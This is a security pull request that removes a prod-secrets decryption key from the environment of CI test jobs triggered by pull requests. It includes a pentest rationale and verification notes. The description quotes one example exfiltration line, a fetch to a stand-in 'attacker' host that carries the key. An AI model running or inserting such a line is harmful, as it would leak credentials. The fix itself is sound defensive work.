### PR TITLE
fix(security): do not expose DOTENV_PRIVATE_KEY to PR-triggered test jobs (CI-DK)

### DIFF
--- a/.github/workflows/package-tests.yml
+++ b/.github/workflows/package-tests.yml
@@ -158,7 +158,13 @@ jobs:
     timeout-minutes: 20
     env:
       npm_config_engine_strict: 'false'
-      DOTENV_PRIVATE_KEY: ${{ secrets.DOTENV_PRIVATE_KEY }}
+      # Only materialize the master dotenvx decryption key on non-PR events
+      # (push / workflow_dispatch). On pull_request, PR-head test code runs
+      # in this job; exposing DOTENV_PRIVATE_KEY would let a same-repo branch
+      # PR read all 80+ prod secrets decryptable with that one key. The
+      # `if: env.DOTENV_PRIVATE_KEY != ''` step below skips the env-gated
+      # suite when the key is absent. (pentest 2026-07-27)
+      DOTENV_PRIVATE_KEY: ${{ github.event_name != 'pull_request' && secrets.DOTENV_PRIVATE_KEY || '' }}
     steps:
       - name: Checkout
         uses: actions/checkout@v7


### PR DESCRIPTION
## Demo
Non-visual change — no screen recording applies. Proof: the `api` job env now resolves `DOTENV_PRIVATE_KEY` to empty on `pull_request`, so the env-gated `kortix-api test:coverage` step skips on PRs (matching fork-PR behavior) and the key is never materialized for PR-head code.

## Why
Weekly pentest (2026-07-27) escalated CI-DK to **HIGH**. The `api` job in `package-tests.yml` injected `DOTENV_PRIVATE_KEY` (the master dotenvx decryption key for 80+ prod secrets, including `SUPABASE_SERVICE_ROLE_KEY`, `STRIPE_SECRET_KEY`, `AWS_BEDROCK_API_KEY`, `KORTIX_GITHUB_APP_PRIVATE_KEY`) into the runner env on `pull_request`. On same-repo branch PRs, PR-head test code (`apps/api/src/__tests__/**/*.test.ts`) runs with the key in env, so a malicious test could `fetch(\`https://attacker/\${process.env.DOTENV_PRIVATE_KEY}\`)` and exfiltrate the full prod secret set. Gitleaks scans diffs only — it does not see runtime env reads.

## What changed
- **`.github/workflows/package-tests.yml`** — `DOTENV_PRIVATE_KEY` is now `${{ github.event_name != 'pull_request' && secrets.DOTENV_PRIVATE_KEY || '' }}`. The existing `if: env.DOTENV_PRIVATE_KEY != ''` step then skips the env-gated suite on PRs (as it already does for fork PRs, which get no secrets). The suite still runs fully on `push` to main/staging/prod and `workflow_dispatch`.

## Verification
- YAML validated.
- Behavior: on `pull_request`, `env.DOTENV_PRIVATE_KEY` resolves to `''` → the `if: env.DOTENV_PRIVATE_KEY != ''` step prints the skip notice. On `push`, the key is present and the full suite runs.

## Risk / rollback
Low: PRs lose the env-gated kortix-api suite (they already do for fork PRs). The full suite still runs on merge to main/staging. Revert is a single line.